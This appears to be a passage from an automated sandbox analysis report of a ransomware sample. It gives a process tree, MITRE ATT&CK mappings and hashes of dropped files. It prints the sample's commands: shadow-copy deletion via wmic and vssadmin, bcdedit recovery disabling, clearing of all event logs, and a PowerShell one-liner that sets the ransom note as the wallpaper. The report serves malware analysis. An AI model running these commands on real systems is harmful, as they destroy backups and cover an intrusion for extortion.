PID 464 wrote to memory of 4284	464	hack.exe	90
PID 464 wrote to memory of 4284	464	hack.exe	90
PID 464 wrote to memory of 444	464	hack.exe	91
PID 464 wrote to memory of 444	464	hack.exe	91
PID 464 wrote to memory of 2648	464	hack.exe	92
PID 464 wrote to memory of 2648	464	hack.exe	92
PID 3680 wrote to memory of 12168	3680	cmd.exe	95
PID 3680 wrote to memory of 12168	3680	cmd.exe	95
PID 2680 wrote to memory of 12272	2680	cmd.exe	97
PID 2680 wrote to memory of 12272	2680	cmd.exe	97
PID 4284 wrote to memory of 12680	4284	cmd.exe	98
PID 4284 wrote to memory of 12680	4284	cmd.exe	98
PID 2648 wrote to memory of 12204	2648	cmd.exe	96
PID 2648 wrote to memory of 12204	2648	cmd.exe	96
PID 444 wrote to memory of 13268	444	cmd.exe	99
PID 444 wrote to memory of 13268	444	cmd.exe	99
PID 464 wrote to memory of 28504	464	hack.exe	103
PID 464 wrote to memory of 28504	464	hack.exe	103
PID 28504 wrote to memory of 28860	28504	powershell.exe	105
PID 28504 wrote to memory of 28860	28504	powershell.exe	105
PID 28504 wrote to memory of 29008	28504	powershell.exe	106
PID 28504 wrote to memory of 29008	28504	powershell.exe	106

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\T8IRU_sex.exe
"C:\Users\Admin\AppData\Local\Temp\T8IRU_sex.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Users\Admin\AppData\Local\Temp\hack.exe
  "C:\Users\Admin\AppData\Local\Temp\hack.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c wmic shadowcopy delete /nointeractive
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:12168
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:12272
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c bcdedit /set {default} recoveryenabled No
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:12680
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:444
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:13268
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:12204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:28504
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\513130469.png /f
      4⤵
      Sets desktop wallpaper using registry
      PID:28860
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
      4⤵
      PID:29008
- C:\Users\Admin\AppData\Local\Temp\rufus-4.6p.exe
  "C:\Users\Admin\AppData\Local\Temp\rufus-4.6p.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3952

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3632

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4456

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
28KB

MD5
63695fa3a1382e1d885297aaa4353f48

SHA1
a71e48dae9cf40d7b498fe1ee65dc79b939c86ac

SHA256
54f46062e4003b7c312ddbdd7fb8f66c5514757ddd1b6666c75f6755528ea7a9

SHA512
19f5739ae1c0da6fb6364401f99f8b944af0e0b2ca8d9deb0006d1d7483db2fd3c97ada44c685c5d16c1bbc1d8e6c466f1b39b809d13c1a21847d1d87355fc65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
da5f72415ab3ec473fec571b22dd78e8

SHA1
cc1e81830706b3b1faa1357bffcaae93219d6680

SHA256
d524aa42b7b3cedcdd8317447904b4a729ef1721085dff5df3311a253e5ab9fb

SHA512
62bce97b7d00c5dbe43315c08414acc092731851a2e47e0860ef0cc1a853b7ce7d2b8439a3d94a93393a98881f2b256c4eaa74865262610fef29aa8a285cebbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhmtstdx.bno.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hack.exe

Filesize
807KB

MD5
e27b5291c8fb2dfdeb7f16bb6851df5e

SHA1
40207f83b601cd60905c1f807ac0889c80dfe33f

SHA256
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f

SHA512
2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rufus-4.6p.exe

Filesize
1.5MB

MD5
8fe64da09af371b02a31828415ece8f3

SHA1
5b5c90dcd425c814b555a4567405601aa977ee0b

SHA256
8279696c1d78b14618500e9135886a3667b9decc65946f3729002e4bfdbb20ab

SHA512
e49f9b1c9d33364101ad2fd4f2c5ed030700cc941bb469cf2ce7d5b32c51cab9e62b265e05cbd92435453e7e4008c9990bea532298676f7d81e5d6dcdc2f590b

Download Submit
C:\Users\Admin\AppData\Local\Temp\rufus.ini

Filesize
41B

MD5
7b9f798f8ce3b676b01beeffd83bde84

SHA1
02a78aa43851cec825c5369172208b42d0078d02

SHA256
0a38de4e997bd157790e8e162994960877456c8d413e6c02acbbd620a49c423a

SHA512
b10ee7a7e93d18eefd852d83e6d05c6e22cb9a850ba0043b71464f69e81ee51675c59d4cd4026141faa043b26ae2760f283fc5792b7e7184b439f68064342371

Download Submit
C:\Users\Admin\AppData\Local\Temp\rufus.ini

Filesize
70B

MD5
7bc5d038d68d3971f22cc85bf032f584

SHA1
b4985d52d650eb863405eadc97570a64da87f936

SHA256
86cc4a8c8104014221c0c97812590f5c2727baaa6ba330477129407079c4704d

SHA512
0b4cda948214fe758aaec452fe2ca9efb52bee404da10d165c73c1222beb75b9ab7b4aef7a1d11c75f46c6e5e04e802810c0cb16a9ae43c4dc7d159fa219a84f

Download Submit
F:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
c92c2b70fb37f84aab38412ad9226aa8

SHA1
14f2e9a83285612d0a7b2c83b8f89bccfde6c154

SHA256
d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

SHA512
04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

Download Submit
memory/1408-9-0x00007FF6102E0000-0x00007FF610610000-memory.dmp

Filesize
3.2MB

Download
memory/3952-22824-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22827-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22745-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22855-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22791-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-16757-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22800-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22819-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-7-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22746-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22833-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22838-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22841-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22845-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22848-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/3952-22852-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp

Filesize
4.4MB

Download
memory/12204-17717-0x0000024F72BB0000-0x0000024F72BD2000-memory.dmp

Filesize
136KB

Download